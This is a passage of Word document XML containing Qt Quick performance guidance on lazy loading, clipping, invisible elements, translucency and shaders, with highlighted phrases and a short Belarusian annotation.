        <w:t>should be initialized lazily in most cases</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and deleted when no longer in use, to avoid the ongoing cost of leaving them active (for example, rendering, animations, property binding evaluation, etc).</w:t>
      </w:r>
      <w:r w:rsidR="00FE2B61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00907C71" w:rsidRPr="00907C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00FE2B61" w:rsidRPr="00907C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>гэта будзе ў маёй сістэме, калі я буду вяртацца да ранейшых дней.</w:t>
      </w:r>
      <w:r w:rsidR="00907C71" w:rsidRPr="00907C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00907C71" w:rsidRPr="00907C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>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An item loaded with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> element may be released by resetting the "</w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" or "</w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sourceComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">" property of the Loader, while other items may be </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>explicitly released by calling destroy()</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on them. </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In some cases</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, it may be necessary to leave the item active, in which case it should be made invisible at the very least.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See the upcoming section on </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for more information on </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>active but invisible elements</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00877A60">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1006" w:name="rendering"/>
      <w:bookmarkStart w:id="1007" w:name="_Toc483000743"/>
      <w:bookmarkStart w:id="1008" w:name="_Toc483003753"/>
      <w:bookmarkStart w:id="1009" w:name="_Toc483604095"/>
      <w:bookmarkStart w:id="1010" w:name="_Toc483605315"/>
      <w:bookmarkEnd w:id="1006"/>
      <w:r w:rsidRPr="00877A60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rendering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1007"/>
      <w:bookmarkEnd w:id="1008"/>
      <w:bookmarkEnd w:id="1009"/>
      <w:bookmarkEnd w:id="1010"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scene graph used for rendering in</w:t>
      </w:r>
      <w:r w:rsidR="00720D50">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId664" w:history="1">
        <w:r w:rsidRPr="00147D8E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00720D50">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>highly dynamic</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animated user interfaces to be rendered fluidly at 60 FPS</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. There are some things which can </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dramatically decrease rendering performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, however, and developers </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should be careful to avoid these pitfalls</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> wherever possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00720D50">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1011" w:name="clipping-performance"/>
      <w:bookmarkStart w:id="1012" w:name="clipping"/>
      <w:bookmarkStart w:id="1013" w:name="_Toc483000744"/>
      <w:bookmarkStart w:id="1014" w:name="_Toc483003754"/>
      <w:bookmarkStart w:id="1015" w:name="_Toc483604096"/>
      <w:bookmarkStart w:id="1016" w:name="_Toc483605316"/>
      <w:bookmarkEnd w:id="1011"/>
      <w:bookmarkEnd w:id="1012"/>
      <w:r w:rsidRPr="00720D50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clipping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1013"/>
      <w:bookmarkEnd w:id="1014"/>
      <w:bookmarkEnd w:id="1015"/>
      <w:bookmarkEnd w:id="1016"/>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147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clipping is disabled by default, and should only be enabled when required</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clipping is a visual effect, NOT an optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. It increases (rather than reduces) complexity for the renderer. If clipping is enabled, an item will clip its own painting, as well as the painting of its children, to its bounding rectangle. This stops the renderer from being able to reorder the drawing order of elements freely, resulting in a sub-optimal best-case scene graph traversal.</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147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Clipping inside a delegate is especially bad and should be avoided at all costs</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00720D50">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1017" w:name="over-drawing-and-invisible-elements"/>
      <w:bookmarkStart w:id="1018" w:name="_Toc483000745"/>
      <w:bookmarkStart w:id="1019" w:name="_Toc483003755"/>
      <w:bookmarkStart w:id="1020" w:name="_Toc483604097"/>
      <w:bookmarkStart w:id="1021" w:name="_Toc483605317"/>
      <w:bookmarkEnd w:id="1017"/>
      <w:r w:rsidRPr="00720D50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Over-drawing and Invisible Elements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1018"/>
      <w:bookmarkEnd w:id="1019"/>
      <w:bookmarkEnd w:id="1020"/>
      <w:bookmarkEnd w:id="1021"/>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If you have elements which are </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>totally covered by other (opaque) elements, it is best to set their "visible" property to</w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or they will be drawn needlessly.</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Similarly, </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>elements which are invisible</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for </w:t>
      </w:r>
      <w:r w:rsidRPr="00720D50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example, the</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> second tab in a tab widget, while the first tab is shown) </w:t>
      </w:r>
      <w:r w:rsidRPr="00720D50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>but need to be initialized at startup time</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for example, if the cost of instantiating the second tab takes too long to be able to do it only when the tab is activated), </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should have their "visible" property set to</w:t>
      </w:r>
      <w:r w:rsidR="00720D50">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00147D8E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, in order to avoid the cost of drawing them (although as previously explained, they will still incur the cost of any animations or bindings evaluation since they are still active).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00720D50">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1022" w:name="translucent-vs-opaque"/>
      <w:bookmarkStart w:id="1023" w:name="_Toc483000746"/>
      <w:bookmarkStart w:id="1024" w:name="_Toc483003756"/>
      <w:bookmarkStart w:id="1025" w:name="_Toc483604098"/>
      <w:bookmarkStart w:id="1026" w:name="_Toc483605318"/>
      <w:bookmarkEnd w:id="1022"/>
      <w:r w:rsidRPr="00720D50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Translucent vs Opaque</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1023"/>
      <w:bookmarkEnd w:id="1024"/>
      <w:bookmarkEnd w:id="1025"/>
      <w:bookmarkEnd w:id="1026"/>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976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Opaque content is generally a lot faster to draw than translucent</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The reason being that </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>translucent content needs blending</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and that the renderer can potentially optimize opaque content better.</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CB35CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An image with one translucent pixel is treated as fully translucent, even though it is mostly opaque</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The same is true for an</w:t>
      </w:r>
      <w:r w:rsidR="00CB35CC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId665" w:anchor="borderimage" w:history="1">
        <w:r w:rsidRPr="00976E5D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>BorderImage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CB35CC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with transparent edges</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00CB35CC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1027" w:name="shaders"/>
      <w:bookmarkStart w:id="1028" w:name="_Toc483000747"/>
      <w:bookmarkStart w:id="1029" w:name="_Toc483003757"/>
      <w:bookmarkStart w:id="1030" w:name="_Toc483604099"/>
      <w:bookmarkStart w:id="1031" w:name="_Toc483605319"/>
      <w:bookmarkEnd w:id="1027"/>
      <w:r w:rsidRPr="00CB35CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shaders</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1028"/>
      <w:bookmarkEnd w:id="1029"/>
      <w:bookmarkEnd w:id="1030"/>
      <w:bookmarkEnd w:id="1031"/>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The</w:t>
      </w:r>
      <w:r w:rsidR="00CB35CC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId666" w:history="1">
        <w:r w:rsidRPr="00976E5D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ShaderEffect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CB35CC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
